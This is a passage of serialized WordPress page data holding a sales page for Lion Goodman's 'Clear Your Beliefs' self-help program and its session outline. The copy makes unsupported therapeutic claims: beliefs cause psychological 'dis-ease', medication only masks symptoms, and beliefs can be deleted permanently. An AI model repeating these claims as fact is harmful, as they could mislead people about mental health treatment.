grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:60746:"<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" 